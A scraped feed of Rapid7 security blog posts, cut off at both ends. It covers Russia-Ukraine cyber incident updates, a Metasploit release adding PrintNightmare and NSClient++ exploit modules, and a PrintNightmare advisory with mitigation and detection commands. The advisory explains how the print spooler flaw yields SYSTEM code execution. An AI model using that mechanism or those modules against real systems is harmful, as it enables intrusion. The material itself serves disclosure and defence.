[announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * ******52 US organizations were impacted by RagnarLocker ransomware****,**** including critical infrastructures******\n\nThe FBI reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware code excludes execution on post-Soviet Union countries, including Russia, based on a geolocation indicator embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>) _\n\n_Available in Threat Library as: Ragnar Locker_\n\n * ******US energy companies were attacked prior to the Russian invasion to Ukraine******\n\nDuring a two-week blitz in mid-February, hackers received access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel to the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_ \n\n\n * ******#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data ******\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems impacting the Russian cities: Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_ \n\n\n * **Anonymous claims to hack Russian TV services to broadcast footage of the war with Ukraine**\n\nRussian live TV channels Russia 24, Channel One, and Moscow 24, as well as Wink and Ivi, Netflix like services, have been hacked to broadcast footage of the war with Ukraine according to Anonymous.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nUkraine\u2019s deputy chief of their information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * ******Russia blocked access to social media platforms and Western news sites******\n\nRussia has prevented its residents access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. With that, the BBC is now providing access to its website via the Dark Web and has reinstated their BBC shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian Government websites including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. Most recently, that includes\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->): **Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents to CISA, as well as ransomware payments. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>): **\u201c[E]specially in light of Russia\u2019s escalating actions inside of Ukraine,\u201d FCC seeks comment on vulnerabilities threatening the Border Gateway Protocol (BGP) that is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it has no specific, credible threat against the U.S. at this time. It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * ******An Anonymous-affiliated hacking group claims to have hacked a branch Russian Military and Rosatom, the Russian State Atomic Energy Corporation****.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked access to the phone directory of the military prosecutor's office of the southern military district of Russia, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * ******A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military****.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_ \n\n\n * ******An Anonymous hacktivist associated group took down the popular Russian news website lenta.ru******\n\nAs part of the OpRussia cyber-attack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T18:55:38", "description": "## PrintNightmare\n\n![Metasploit Wrap-up](https://blog.rapid7.com/content/images/2021/07/metasploit-blg-2-small-1.png)\n\nRapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), have added a new module for [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\\SYSTEM`.\n\nBecause Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.\n\n[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. For more information and a full timeline, see [Rapid7\u2019s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!\n\n## NSClient++\n\nGreat work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged windows account to gain admin access on a windows system and start a shell.\n\nFor this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.\n\n## New module content (2)\n\n * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) \\- A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the `SYSTEM` user.\n\n * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.\n\n## Enhancements and features\n\n * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) \\- This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).\n\n## Bugs fixed\n\n * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) \\- A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.\n * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `apport_abrt_chroot_priv_esc` module where if the `apport-cli` binary was not in the PATH the check method would fail.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)\n * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the\n\n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-07-09T17:53:41", "type": "rapid7blog", "title": "Metasploit Wrap-up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T17:53:41", "id": "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "href": "https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "![CVE-2021-34527 \$PrintNightmare\$: What You Need to Know](https://blog.rapid7.com/content/images/2021/06/evil-printer.jpeg)\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier,[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds and a patch remains unavilable at this time. \nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. We advise folowing one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that the `RpcAddPrinterDriver` is not the only vulnerable function, and the Win32 `AddPrinterDriverEx` function will also work correctly.Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:** \nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a printer server. Administrators can install both a signed or unsigned printer driver on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users will be either administrators or non-administrators. Delegates will no longer be honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. Dedicated print servers may still be vulnerable if the spooler is not stopped. Microsoft [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since the active directory has no way to remove old queues that no longer exist unless the spooler service is running on at least one domain controller in each site. However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd:\n \n \n net stop spooler\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' | Select-String -InputObject {$_.message} -Pattern 'The print spooler failed to load a plug-in module'\n \n \n \n Get-WinEvent -FilterHashtable @{Logname='Microsoft-Windows-PrintService/Operational';ID=316} | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the two registry keys detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. Checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally ensure that Point and Print has been disabled in customer environments. InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-30T18:02:41", "description": "![Pushing Open-Source Security Forward: Insights From Black Hat 2022](https://blog.rapid7.com/content/images/2022/08/open-source-black-hat.jpg)\n\n[Open-source security](<https://www.rapid7.com/open-source/>) has been a hot topic in recent years, and it's proven to be something of a double-edged sword. On the one hand, there's an understanding of the potential that open-source tools hold for democratizing security, making industry best practices accessible to more organizations and helping keep everyone's data better protected from attackers. On the other hand, open-source codebases have been the subject of some of the most serious and high-impact vulnerabilities we've seen over the past 12 months, namely [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\nWhile the feeling around open-source understandably wavers between excitement and trepidation, one thing is for sure: Open-source frameworks are here to stay, and it's up to us to ensure they deliver on their potential and at the same time remain secure.\n\nThe future of open-source was a common theme at [Black Hat 2022](<https://www.rapid7.com/info/events-2022/post-blackhat-2022/>), and two members of the Rapid7 research team \u2014 Lead Security Research Spencer McIntyre and Principal Security Researcher Curt Barnard \u2014 shined a light on the work they've been doing to improve and innovate with open-source tools. Here's a look at their presentations from Black Hat, and how their efforts are helping push open-source security forward.\n\n## A more powerful Metasploit\n\nSpencer, whose work focuses primarily on Rapid7's widely used attacker emulation and penetration testing tool [Metasploit](<https://www.rapid7.com/products/metasploit/>), shared the latest and greatest improvements he and the broader team have made to the open-source framework in the past year. The upgrades they've made reflect a reality that security pros across the globe are feeling everyday: The perimeter is disappearing.\n\nIn a threat environment shaped by [ransomware](<https://www.rapid7.com/blog/post/2022/06/16/new-report-shows-what-data-is-most-at-risk-to-and-prized-by-ransomware-attackers/>), [supply chain attacks](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>), and widespread vulnerabilities like Log4Shell, bad actors are increasingly stringing together complex attack workflows leveraging multiple vulnerabilities. These techniques allow adversaries to go from outside to within an organization's network more quickly and easily than ever before.\n\nThe updates Spencer and team have made to Metasploit are intended to help security teams keep up with this shift, with more modern, streamlined workflows for testing the most common attack vectors. These recent improvements to Metasploit include:\n\n****Credential capturing:**** Credential capture is a key component of the attacker emulation toolkit, but previously, the process for this in Metasploit involved spinning up 13 different modules and managing and specifying configurations for each. Now, Metasploit offers a 